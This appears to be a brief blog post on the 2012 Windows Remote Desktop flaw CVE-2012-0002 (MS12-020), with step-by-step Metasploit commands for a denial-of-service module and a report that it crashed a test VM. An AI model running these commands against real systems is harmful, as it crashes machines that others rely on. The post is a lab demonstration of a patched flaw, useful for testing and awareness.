CVE-2012-0002 is an internally reported vulnerability in Microsoft’s Remote Desktop Application. Patch for this vulnerability was released on March 13, 2012 as MS12-020. This vulnerability can cause a full system compromise. Failed attempts to exploit this vulnerability can cause a DoS for RDP.
Metasploit has working exploit for DoS for this vulnerability. The remote system should be running terminal services service for this exploit to work. Here’s how it goes:
1. Start msfconsole
2. Give the command – use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
3. Then set the IP address of the remote system giving the command – set RHOST <IP>
4. Then give the command – ‘run’ to execute the exploit on the remote system
I tried it on a local VM and the VM showed a BSOD.